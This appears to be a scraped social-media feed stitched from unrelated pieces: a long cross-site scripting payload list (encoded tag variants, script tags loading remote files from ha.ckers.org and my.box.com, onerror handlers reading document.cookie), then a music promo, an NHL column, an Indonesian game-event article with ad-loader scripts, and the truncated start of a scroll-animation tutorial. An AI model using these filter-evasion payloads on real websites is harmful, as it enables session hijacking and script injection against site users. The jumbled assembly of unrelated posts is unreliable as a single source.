&#x0003c                    &#x00003c                    &#x000003c                    <                    <                    <                    <                    <                    <                    &#X3c                    &#X03c                    &#X003c                    &#X0003c                    &#X00003c                    &#X000003c                    <                    <                    <                    <                    <                    <                    &#x3C                    &#x03C                    &#x003C                    &#x0003C                    &#x00003C                    &#x000003C                    <                    <                    <                    <                    <                    <                    &#X3C                    &#X03C                    &#X003C                    &#X0003C                    &#X00003C                    &#X000003C                    <                    <                    <                    <                    <                    <                    \x3c                    \x3C                    \u003c                    \u003C                    <iframe src=http://ha.ckers.org/scriptlet.html>                    <IMG SRC=\"javascript:alert('XSS')\"                    <SCRIPT SRC=//ha.ckers.org/.js>                    <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>                    <<SCRIPT>alert(\"XSS\");//<</SCRIPT>                    <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>                    <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>                    <IMG SRC=\"   javascript:alert('XSS');\">                    perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out                    perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out                    <IMG SRC=\"javascript:alert('XSS');\">                    <IMG SRC=\"javascript:alert('XSS');\">                    <IMG SRC=\"jav ascript:alert('XSS');\">                    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>                    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>                    <IMG SRC=javascript:alert('XSS')>                    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>                    <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">                    <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>                    <IMG SRC=javascript:alert("XSS")>                    <IMG SRC=JaVaScRiPt:alert('XSS')>                    <IMG SRC=javascript:alert('XSS')>                    <IMG SRC=\"javascript:alert('XSS');\">                    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>                    '';!--\"<XSS>=&{()}                    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>                    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>                    '';!--"<XSS>=&{()}                    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>                    <IMG SRC="javascript:alert('XSS');">                    <IMG SRC=javascript:alert('XSS')>                    <IMG SRC=javascrscriptipt:alert('XSS')>                    <IMG SRC=JaVaScRiPt:alert('XSS')>                    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">                    <IMG SRC=" &#14;  javascript:alert('XSS');">                    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <<SCRIPT>alert("XSS");//<</SCRIPT>                    <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>                    \";alert('XSS');//                    </TITLE><SCRIPT>alert("XSS");</SCRIPT>                    ¼script¾alert(¢XSS¢)¼/script¾                    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">                    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>                    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>                    <TABLE BACKGROUND="javascript:alert('XSS')">                    <TABLE><TD BACKGROUND="javascript:alert('XSS')">                    <DIV STYLE="background-image: url(javascript:alert('XSS'))">                    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">                    <DIV STYLE="width: expression(alert('XSS'));">                    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>                    <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">                    <XSS STYLE="xss:expression(alert('XSS'))">                    exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>                    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>                    a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);                    <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>                    <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>                    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>                    <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION                    <form><button formaction="javascript:alert(123)">crosssitespt                    <frameset onload=alert(123)>                    <!--<img src="--><img src=x onerror=alert(123)//">                    <style><img src="</style><img src=x onerror=alert(123)//">                    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">                    <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">                    <embed src="javascript:alert(1)">                    <? foo="><script>alert(1)</script>">                    <! foo="><script>alert(1)</script>">                    </ foo="><script>alert(1)</script>">                    <script>({0:#0=alert/#0#/#0#(123)})</script>                    <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>                    <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>                    <script src="#">{alert(1)}</script>;1                    <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>                    <svg xmlns="#"><script>alert(1)</script></svg>                    <svg onload="javascript:alert(123)" xmlns="#"></svg>                    <iframe xmlns="#" src="javascript:alert(1)"></iframe>                    +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-                    %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-                    +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-                    %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-                    %253cscript%253ealert(document.cookie)%253c/script%253e                    “><s”%2b”cript>alert(document.cookie)</script>                    “><ScRiPt>alert(document.cookie)</script>                    “><<script>alert(document.cookie);//<</script>                    foo<script>alert(document.cookie)</script>                    <scr<script>ipt>alert(document.cookie)</scr</script>ipt>                    %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E                    ‘; alert(document.cookie); var foo=’                    foo\’; alert(document.cookie);//’;                    </script><script >alert(document.cookie)</script>                    <img src=asdf onerror=alert(document.cookie)>                    <BODY ONLOAD=alert(’XSS’)>                    <script>alert(1)</script>                    "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>                    <video src=1 onerror=alert(1)>                    <audio src=1 onerror=alert(1)>                                                        
     © 2019 GitHub, Inc.
       Terms
       Privacy
       Security
       Status
       Help
                 Contact GitHub
       Pricing
     API
     Training
       Blog
       About
1 note · View note
nagisamusic · 6 years ago
Text
★Link to Web contents...
SA-105 Projectの他の楽曲の紹介です。主にFutureBassやEDM、ProgressiveHouse/Tranceなどです。ホームページには楽譜や五線紙などもございます。是非、ご訪問ください。
This is another introduction to the SA-105 Project. It is mainly FutureBass, EDM, ProgressiveHouse / Trance, etc. Please also score notes and staff paper on the homepage. 
◆SA-105 Project Official Homepage http://wind.mond.jp
◆SA-105 Project YouTube Channel
youtube
◆SA-105 Project SoundCloud
[SA-105 Project 2](https://soundcloud.com/sa105_2 "SA-105 Project 2") · [Everything all right... (FANTOM 6 Plays Electro House)](https://soundcloud.com/sa105_2/every "Everything all right... (FANTOM 6 Plays Electro House)")
Nagisa RecordsTwitter
https://twitter.com/s_nagi3
◆Contact us... http://wind.mond.jp/contact.html
1 note · View note
your-dietician · 4 years ago
Text
What will ESPN’s coverage of the NHL look like next season?
New Post has been published on https://tattlepress.com/nhl/what-will-espns-coverage-of-the-nhl-look-like-next-season/
What will ESPN’s coverage of the NHL look like next season?
Tumblr media
The network’s coverage starts with the July 21 Seattle expansion draft, hosted by Chris Fowler on ESPN2. John Buccigross will host the NHL Draft two days later. Those shows will be produced by NHL Network.
When Gross spoke over the phone this past week, ESPN (which reportedly paid $410 million a year for seven years of NHL rights) and Turner ($225 million a year over the same period) still hadn’t divvied the games. The NHL had yet to release its 2021-22 schedule. Its puck- and player-tracking data has not seen the light of day.
“One thing we’re trying to get our arms around is what analytics teams and coaches use to showcase in our game coverage, our studio coverage,” Gross said. “Camera positions is another thing we’re looking at, talking to the league to see how we can showcase and document the games.”
Strategy and speed are the buzzwords Gross hears in his daily conversations with NHL people. Capturing both, while serving hard-core fans, hooking viewers from the massive pool of casual sports viewers who don’t give hockey much thought, attracting diverse genders and backgrounds . . . all are among Gross’s concerns.
“There has to be a level of entertainment without it being forced,” he said. “There’s really nothing worse on TV than forced fun. We have to find our spots, when we get [Chris] Chelios and [Mark] Messier together, who have a relationship. We’ll mix and match with other folks.”
Chelios and Messier, along with Steve Levy, will likely work the major events. “We know how that works,” Gross said. Hearing the two Hall of Famers, owners of some sharp elbows, chime in on player safety decisions should be interesting.
While he may not be hockey’s answer to Charles Barkley, Chelios does seem like a straight shooter. In a phone call, he acknowledged he wasn’t looking for a gig when he reached out to ESPN after the announcement. He was calling as a dad, hoping that his daughter, Lightning TV reporter Caley Chelios, was on the network’s radar.
“I like to think I’ll call it like it is,” said Chelios, 59, “Even though it’s a little different than when I played, hockey’s hockey.”
Messier, Chelios, Hilary Knight, Ray Ferraro, Brian Boucher, and Cassie Campbell-Pascall were among the first names Gross mentioned when speaking about his roster, but a lineup has yet to be solidified. He noted that women will be featured prominently in on-air roles.
The list of local connections is long, from Boucher (Woonsocket, R.I.), A.J. Mleczko (Nantucket/Harvard), former Red Sox play-by-play man Sean McDonough (Boston), Buccigross (who has Boston roots), Rick DiPietro (Winthrop/Boston University), ex-Boston College Eagles Blake Bolden and Bob Wischusen, and Emily Kaplan, a former Globie.
Gross said another fan favorite from the past, play-by-play announcer Gary Thorne, remains an option. He spoke with the agent for Thorne, 73, this past week.
“We’re not done yet,” Gross said. “We want to see what the schedule looks like, and what other decisions we have to make. We still have time.”
What’s the game-changing idea that will separate ESPN? It won’t be glow pucks and robots (fun as they were for younger fans in the ’90s). What’s hockey’s version of the K-Zone?
“Some people thought the first-and-10 line would be too intrusive,” Gross mused. “Now you can’t really watch a game without it.”
AWARD SEASON
One voter’s ballot in depth
Tumblr media
Connor McDavid became the first unanimous MVP since Wayne Gretzky in 1982, collecting all 100 first-place votes for the Hart Memorial Trophy.DARRYL DYCK/Associated Press
I consider it a privilege to vote on year-end NHL awards as part of my duties with the Professional Hockey Writers Association. I’m not alone. My peers and I want to get it right.
When it came to this season’s MVP, I believe we did.
Connor McDavid earned all 100 first-place votes for the Hart Trophy, becoming the second unanimous MVP ever (Wayne Gretzky, 1982). McDavid’s 105 points in 56 games goes down as one of the most dominant seasons in league history. He was playing at a different speed than everyone else.
In the voting bloc — trimmed from about 175 to 100 members, and dispersed regionally to address imbalances created by the divisional-only schedule — we saw some refreshingly progressive thinking, and as always, some strange calls. One Edmonton writer voted McDavid’s teammate, Leon Draisaitl, second for the Selke. Draisaitl made strides this season, but it would be generous to call him an above-average defensive forward, much less elite.
In this space last year, I delved into my methodology, which blends in-person viewings, video study, and number-crunching. Obviously this season, I relied more on the latter two. I was among the few beat writers who traveled all season, but I only watched the East Division up close.
My ballot, and some quick takes:
Hart Trophy — 1. McDavid; 2. Auston Matthews; 3. Nathan MacKinnon; 4. Aleksander Barkov; 5. Brad Marchand.
Relatively easy calls. McDavid was incredible, and the other four were the driving forces on good teams. Marchand was ranked as high as No. 2 on six ballots.
Norris Trophy — 1. Adam Fox; 2. Cale Makar; 3. Charlie McAvoy; 4. Dougie Hamilton; 5. MacKenzie Weegar.
A youth movement, and an ECAC/Hockey East top three. Makar (UMass) missed 12 games, or 21 percent of the season, leaving the door open for Fox (Harvard), who was the Rangers’ MVP in his second season. McAvoy (BU) might be the best five-on-five defender in the game. Weegar opened eyes after Aaron Ekblad’s injury. Eleven blue liners earned top-three votes. Victor Hedman was down-ballot for me, after an injury-plagued regular season. Don’t ask me why someone gave Kris Letang a first-place vote. Fun fact: Fox is the first player of Jewish descent to win a major NHL award.
Calder Trophy — 1. Kirill Kaprizov; 2. Jason Robertson; 3. Alex Nedeljkovic; 4. Josh Norris; 5. Igor Shesterkin.
Kaprizov (27 goals and 51 points in 55 games) was a slam dunk, though Robertson had a brief midseason run that made it interesting.
Lady Byng Trophy — 1. Jaccob Slavin; 2. Jared Spurgeon; 3. Barkov; 4. Roope Hintz; 5. Johnny Gaudreau.
I’ve said before that writers should not vote for this. Referees should. Slavin, an elite defender playing heavy minutes, committed one penalty all season (for shooting the puck over the glass). Good enough for me.
Selke Trophy — 1. Barkov; 2. Patrice Bergeron; 3. Joel Eriksson Ek; 4. Phillip Danault; 5. Joe Pavelski.
Barkov had a strong MVP case, but his 200-foot excellence was properly recognized here. Bergeron is still Bergeron. Could see Danault, after his lockdown playoffs, be front of mind for a lot of voters next season.
The PWHA does not vote on the Vezina Trophy (the general managers selected Marc-Andre Fleury), but we do pick the year-end All-Star teams. My goalies, in order, were Andrei Vasilevskiy, Fleury, and Juuse Saros. We also pick All-Rookie teams. I had Kaprizov, Robertson, and Norris as my forwards, Ty Smith and K’Andre Miller as my defensemen, and Nedeljkovic in goal.
ETC.
League will not rush to judgment
Tumblr media
Commissioner Gary Bettman said the league is waiting for an independent review of the Blackhawks alleged cover-up of sexual abuse before proceeding.Karl B DeBlaker/Associated Press
The alleged cover-up of sexual assault by the Blackhawks was the leading topic in Gary Bettman’s annual pre-Stanley Cup Final news conference this past week. Rightfully so.
Bettman said the league learned of the allegations “relatively recently” and will wait for an independent review.
According to a lawsuit filed in May, a former Blackhawks player alleges he and another player were assaulted by then-video coach Brad Aldrich during the team’s 2010 championship run. The team’s leadership, which included current GM Stan Bowman, were allegedly informed of the incident by then-skills coach Paul Vincent, whom the players had told.
Aldrich later worked at a high school in Michigan, where he was convicted of sexual assault involving a student. He is now on Michigan’s sex offender registry.
Multiple ex-Blackhawks, including Nick Boynton, Daniel Carcillo (then with the Flyers), and Brent Sopel, spoke out this past week. One unnamed player told The Athletic that “every guy on the team knew.” Captain Jonathan Toews took issue with that, telling that outlet he didn’t hear about the allegations until the end of that summer. He said he couldn’t say for sure if the team “mishandled” the situation.
Bettman, a former lawyer, pumped the brakes. “Let us see what the investigation reveals, and then we can figure out what comes next,” he said. “I think everyone is jumping too far, too fast. This is going to be handled appropriately and professionally, and done right.”
Let’s hope so.
Beijing Olympics not a given
Tumblr media
Commissioner Gary Bettman said the NHL has concerns over the feasibility of sending players to the Olympics next winter.Wilfredo Lee/Associated Press
Later in his Q&A, Bettman shared the league’s “real concerns” over whether it was “sensible” to have a two-week shutdown for the 2022 Beijing Olympics.
Wait, what?
After sitting out 2018 — and watching interest in Olympic hockey wane — the NHL and NHLPA last summer collectively bargained to participate in the 2022 and 2026 Winter Olympics, pending further agreement with both parties, the IIHF, and IOC. But there is no plan yet.
COVID-19 variants remain a worry, and NBC isn’t likely to lobby on the NHL’s inclusion following the expiration of the TV deal. The NHL hopes to release its 2021-22 schedule shortly after the Cup Final.
“Time is running very short,” Bettman said, which came as disappointing news to Tampa Bay’s Victor Hedman.
“The Olympics is one of the biggest dreams of mine and I haven’t been able to participate in one. This might be the last chance I get. That sucks to hear,” said Hedman, who was left off Team Sweden in 2014. “When you get an opportunity to represent your country on the biggest stage, it’s one of those things that you’ll probably never forget. For me, it’s obviously something I’ve been dreaming about my whole life and something I want to do before I hang up my skates.”
Pride working on title defense
Tumblr media
The Boston Pride, two-time Isobel Cup winners, are preparing a title defense for 2021-22.Mary Schwalm/Associated Press
The NWHL’s Boston Pride are deep into an Isobel Cup summer, hauling the trophy from New England lake houses to the Grand Canyon.
As he preps for a title defense, coach Paul Mara is playing his cards close. After a few defections, he’s using his newfound salary-cap space — the league doubled the ceiling to $300,000 — to bring in some outside help.
“Working on a few things,” he said.
The NWHL is feeling momentum entering its seventh season. An influx of sponsorship dollars, visibility from its Isobel Cup playoffs broadcast on NBCSN, and a lot of player raises have elevated the mood.
Since last month, the four franchises under league control — the Buffalo Beauts, Connecticut Whale, Metropolitan Riveters, and Minnesota Whitecaps — were sold to private owners, making it a league of six independent clubs. Expansion is on the horizon, with Montreal a primary target.
Also notable: This past week’s draft, which was streamed on Twitch, included appearances from a range of pro sports personalities, including NHL league and team executives, and USA Hockey reps. The NWHL hasn’t always had such vocal support.
For all the growth, players aren’t yet earning a living wage. Contracts are yearly. Outside opportunities create a talent drain.
The Pride lost president Hayley Moore to the AHL (vice president of hockey operations), replacing her with 1998 US Olympian Colleen Coyne. They are searching for a GM, after Karilyn Pilch this past week signed on with the Chicago Blackhawks’ scouting and player development department.
They also need a few good forwards. Mary Parker, Carlee Turner, and Lexie Laing departed for job and school reasons. Czech standout Tereza Vanisova signed with Leksands IF in Sweden, which will better help her participate in a demanding Olympic training schedule.
League MVP Jillian Dempsey, recovered from shoulder surgery, returns with All-Star linemates McKenna Brand and Christina Putigna, the No. 1 defense pair of Kaleigh Fratkin (two-time NWHL Defender of the Year) and Mallory Souliotis, and netminders Lovisa Selander and Victoria Hanson. That crew, plus whomever Mara can lure to town, should keep the Pride near the top of the standings.
Unlike last season, when the Pride got a boost from No. 1 overall pick Sammy Davis (BU) and six drafted rookies, the draft won’t have a major impact. Because they lost their 2021 first- and second-round picks when they traded up to select Davis, and dealt their third-rounder to Buffalo for future considerations, the Pride picked in the fourth and fifth rounds (Weston’s Finley Frechette and Beverly’s Abby Nearis, both forwards).
The NWHL’s player pool was thinned after the NCAA granted players an extra year of eligibility, leading many of the top draft-eligible players to return to school. Because of that, Boston isn’t the only team that believes next year’s draft will be loaded.
Loose pucks
Tumblr media
Bruce Cassidy (left) has been promoting from within, with assistant coach Jay Pandolfo (center) leaving for Boston University.Winslow Townson/Associated Press
The Bruins have promoted from within of late, calling up coaches from Providence and the player development ranks. It makes sense that fourth-year P-Bruins coach Jay Leach would replace Jay Pandolfo on Bruce Cassidy’s staff, but player development staffers Chris Kelly and Jamie Langenbrunner will also get a look. Like Pandolfo, they were two-way forwards with long NHL résumés . . . As for Pandolfo, the move to BU gives him a shorter path to a head coaching gig. Albie O’Connell, who is entering the final year of his deal, has had a spotty run . . . Bruins strength and conditioning assistant Kenny Whittier also made the move to BU . . . A few first-timers joined NHL benches this past week, including two ex-players, Alex Tanguay (Detroit assistant) and Tuomo Ruutu (Florida assistant), and André Tourigny (Arizona coach). The latter move was particularly interesting, for a league that often recycles head coaches . . . Toews, after a year out of the spotlight with a mysterious illness, is back on the ice. He posted a video message to fans after a practice, saying doctors told him he has “chronic immune response syndrome,” a catch-all term for constant, debilitating stress reactions. Still dealing with a few symptoms, the Blackhawks’ captain believes the condition was brought on by a nasty bout with COVID-19 in February 2020, before the pandemic hit in full; the toll of 13 NHL seasons; and the year-round hockey training schedule he’s followed since he was a young teenager. “I think there’s a lot of things that just piled up,” he said, “where my body just fell apart.” He hopes to return in October . . . Edmonton trimmed Ryan Nugent-Hopkins’s $6 million cap hit, but took a beating on term, when it locked up the No. 2 center to an eight-year, $41 million deal with a full no-move clause. He will be 36 when it expires. “No contract is perfect,” GM Ken Holland acknowledged . . . Hurricanes owner Tom Dundon’s take on game jersey ads, which are coming to the NHL sooner rather than later: “If we look like Formula One or NASCAR, that’d be fine with me.” . . . Glad to see college athletes everywhere get a chance to make some cash off their name and image, following the Supreme Court’s hammering of the paternalistic NCAA. A small step, long overdue.
Matt Porter can be reached at [email protected]. Follow him on Twitter: @mattyports.
Source link
0 notes
kabargames · 4 years ago
Photo
Tumblr media
Event Swordsman Legends Summer Bagikan 9999 Diamond Gratis
(function(d,a,b,l,e,_) if(d[b]&&d[b].q)return;d[b]=function()[]).push(arguments);e=a.createElement(l); e.async=1;e.charset='utf-8';e.src='//static.dable.io/dist/plugin.min.js'; _=a.getElementsByTagName(l)[0];_.parentNode.insertBefore(e,_); )(window,document,'dable','script'); dable('setService', 'kabargames.id'); dable('sendLogOnce'); dable('renderWidget', 'dablewidget_1oV9EjXP'); Hai para pemburu hadiah! Kamu yang ingin mendapatkan banyak hadiah jangan lewatkan Elite Pass Season 35 yang akan hadir di tepat di tanggal 1 April 2021 sampai 30 April 2021 mendatang. Mengusung nama Bloodwing City, Elite Pass Season 35 Free Fire menyapa pemain dengan ciri khas skin yang di dominasi merah dan hitam. Serupa dengan pendahulunya, yakni Elite Pass Season 34 ‘Willful Wonders’, Elite Pass Season 35 Bloodwing City ini juga menawarkan sejumlah hadiah exclusive. Sesuai dengan tema, pemain yang beruntung berkesempatan mendapatkan pernak-pernik in-game bertema kelelawar. Baca Juga : Event Swordsman Legends Summer Bagikan 9999 Diamond Gratis Valid! 5 Pemain dengan Badge Terbanyak Elite Pass Season 34 Kode Redeem Free Fire (FF) April 2021 yang Belum Digunakan FF Advance Server April Segera Dibuka, Dapatkan 3K Diamond Dapatkan 9.999 Diamond & Bundle di Event Shoreline Angel googletag.cmd.push(function() googletag.display('div-gpt-ad-9949385-2'); ); Cara Beli Elite Pass Season 35 Elite Pass Season 35 Bloodwing City terbagi menjadi 2, yaitu Free dan Elite. Untuk bisa membuka hadiah yang disediakan kalian cukup mengeluarkan 999 Diamond saja. Dimana diamonds ini akan digunakan untuk mengupgrade pass ke versi Elite. Cara Pre-order Elite Pass Season 35 NATIVE CONTENT Kimi Hime: Biodata, Fakta, Meme, Foto & Thumbnail Seksi di YT KameAam: Biodata, Fakta & Foto Cosplay Seksi Mobile Legend Lola Zieta: Biodata, Fakta & Kumpulan Foto Cosplay Seksi Sarah Viloid: Biodata, Fakta & Kumpulan Foto Seksi Buat kamu yang ingin mengikuti Pre-order Elite Pass Season 35, simak dan ikuti yuk cara berikut ini: Buka ‘Elite Pass’ di Garena Free Fire Selanjutnya pilih ‘Pre-Order’ yang berada di samping opsi upgrade Tekan ikon ‘Pre-Order’ dengan 999 Diamond Kamu akan dihadapkan dengan pop-up guna mengkonfirmasi pembelian Pelih beli dengan mengklik tombol warna kuning Hadiah pan Blooding City dapat ditemukan di dalam Vault Event Pre-Order Elite Pass Season 35 Loading… (function()var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M450849ScriptRootC398142")[ac](i);tryvar iw=i.contentWindow.document;iw.open();iw.writeln("");iw.close();var c=iw[b];catch(e)var iw=d;var c=d[gi]("M450849ScriptRootC398142");var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=398142;c[ac](dv);var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.mgid.com/k/a/kabargames.id.398142.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);)(); Event pre-order yang diselenggarakan Garena Free Fire (FF) menawarkan hadiah exclusive yang hanya bisa kalian dapatkan saat event ini berlangsung (periode pembelian mulai 28-31 Maret 2021). Hadiah untuk Pre-order pada Season 35 Bloodwing City adalah sebagai berikut: Jeep – Bloodwing City Bloodwing Lass Bundle Bloodwing Slasher Vampire Bat Thompson – Bloodwing City Triple Kicks Bloodwing Surfboard Bloodwing City Loot Box Bloodwing Lad Bundle Hadiah Elite Pass Season 35 tidak akan diberikan secara cuma-cuma. Namun para pemain akan diminta untuk mengumpulkan 250 Badge terlebih dulu. Badge ini bisa kalian dapatkan dengan cara menyelesaikan setiap misi yang dihadirkan, baik itu misi harian atau mingguan. Jika memiliki cukup uang dan tidak mau repot, kamu bisa membeli Badge dengan harga 20 Diamond per Badge. Baca Juga : Event Swordsman Legends Summer Bagikan 9999 Diamond Gratis Polisi China Ringkus Penjual Cheat Game Terbesar di Dunia Valid! 5 Pemain dengan Badge Terbanyak Elite Pass Season 34 Kode Redeem Free Fire (FF) April 2021 yang Belum Digunakan Dapatkan Jeep Gratis di Elite Pass Season 35 Bloodwing City Daftar Hadiah Elite Pass Season 35 Elite Pass Season 35 didominasi pernak-pernik berwarna merah dan hitam yang terinspirasi dari kelelawar. Selain hadiah bundle utama, kamu bisa mendapatkan skin Thompson, Jeep, Loot Box, hingga tas bertema sama. 1. Elite Pass Season 35 (Free) 0 Badge : 50 Gold 5 Badge : Avatar EP S35 10 Badge : Scan x3 20 Badge : Pet Food 30 Badge : Gold Royale Voucher 40 Badge : Atasan pria 50 Badge : Diamond Royale Voucher 60 Badge : Fragment Crate 70 Badge : Discount Voucher 80 Badge : Pet Food 85 Badge : Evo Gun Token Box 90 Badge : 300 Gold 100 Badge : Kaos pria 120 Badge : Summon Airdrop x3 130 Badge : Gold Royale Voucher 140 Badge : Resupply Map x3 145 Badge : Evo Gun Token Box 150 Badge : Banner EP S35 160 Badge : 500 Gold 170 Badge : Fragment Crate II 180 Badge : Bonfire x3 190 Badge : Gold Royale Voucher 200 Badge : Skin parasut 205 Badge : Evo Gun Token Box 210 Badge : Gold Royale Voucher 220 Badge : Bounty Token x3 225 Badge : Awakening Shard 2. Elite Pass Season 35 (Elite) 0 Badge : Skin Jeep 5 Badge : Summon Airdrop x5 10 Badge : Avatar EP S35 15 Badge : Atasan wanita 20 Badge : Weapon Royale Voucher 25 Badge : Resupply Map Playcard (1 Hari) 30 Badge : Banner EP S35 35 Badge : 500 Gold 40 Badge : Diamond Voucher 45 Badge : Bounty Token Playcard (1 Hari) 50 Badge : Bundle wanita 55 Badge : Pet Food x3 60 Badge : Diamond Royale Voucher 65 Badge : Double EXP Card (7 Hari) 70 Badge : Evo Gun Token Box x2 75 Badge : Memory Fragment (Skyler) x100 80 Badge : Skin Machete 85 Badge : Resupply Map x5 90 Badge : Weapon Royale Voucher 95 Badge : Pet Food x3 100 Badge : Skin tas 105 Badge : Scan Playcard (1 Hari) 110 Badge : 500 Gold 115 Badge : Banner EP S35 120 Badge : Scan x3 125 Badge : Skin Thompson 130 Badge : Memory Fragment (Shirou) x100 135 Badge : Avatar EP S35 140 Badge : Emote 145 Badge : Double Gold Card (7 Hari) 150 Badge : Skin Surfboard 155 Badge : Summon Airdrop Playcard (1 Hari) 160 Badge : Pet Food x3 165 Badge : Universal Fragment x100 170 Badge : Cube Fragment x10 175 Badge : Bonfire Playcard (1 Hari) 180 Badge : Evolution Stone 185 Badge : Bounty Token x5 190 Badge : Discount Coupon 195 Badge : Evo Gun Token Box 200 Badge : Skin Loot Crate 205 Badge : Character Lvl.4 Card 210 Badge : Pet Food x3 215 Badge : Universal Fragment x100 220 Badge : Bonfire x5 225 Badge : Bundle pria 250 Badge : Elite Pass Exclusive Chest Nantikan terus informasi terupdate seputar game, gadget dan anime hanya di Kabar Games. Supaya kamu tidak ketinggalan berita, kamu bisa follow akun Instagram dan Facebook Kabar Games. Kamu juga bisa bergabung bersama kami di dalam Channel Discord Kabar Games. Jangan lupa tinggalkan komentar kalian ya! (function(d,a,b,l,e,_) if(d[b]&&d[b].q)return;d[b]=function()[]).push(arguments);e=a.createElement(l); e.async=1;e.charset='utf-8';e.src='//static.dable.io/dist/plugin.min.js'; _=a.getElementsByTagName(l)[0];_.parentNode.insertBefore(e,_); )(window,document,'dable','script'); dable('setService', 'kabargames.id'); dable('sendLogOnce'); dable('renderWidget', 'dablewidget_KoEP9KXB');
https://www.kabargames.id/event-swordsman-legends-summer-bagikan-9999-diamond-gratis/
#BattleRoyale, #EventFreeFire #FreeFire
0 notes
suzanneshannon · 5 years ago
Text
Let’s Make One of Those Fancy Scrolling Animations Used on Apple Product Pages
Apple is well-known for the sleek animations on their product pages. For example, as you scroll down the page products may slide into view, MacBooks fold open and iPhones spin, all while showing off the hardware, demonstrating the software and telling interactive stories of how the products are used.
Just check out this video of the mobile web experience for the iPad Pro:
Source: Twitter
A lot of the effects that you see there aren’t created in just HTML and CSS. What then, you ask? Well, it can be a little hard to figure out. Even using the browser’s DevTools won’t always reveal the answer, as it often can’t see past a <canvas> element.
Let’s take an in-depth look at one of these effects to see how it’s made so you can recreate some of these magical effects in our own projects. Specifically, let’s replicate the AirPods Pro product page and the shifting light effect in the hero image.
The basic concept
The idea is to create an animation just like a sequence of images in rapid succession. You know, like a flip book! No complex WebGL scenes or advanced JavaScript libraries are needed.
By synchronizing each frame to the user’s scroll position, we can play the animation as the user scrolls down (or back up) the page.
Start with the markup and styles
The HTML and CSS for this effect is very easy as the magic happens inside the <canvas> element which we control with JavaScript by giving it an ID.
In CSS, we’ll give our document a height of 100vh and make our <body> 5⨉ taller than that to give ourselves the necessary scroll length to make this work. We’ll also match the background color of the document with the background color of our images.
The last thing we’ll do is position the <canvas>, center it, and limit the max-width and height so it does not exceed the dimensions of the viewport.
html {   height: 100vh; } 
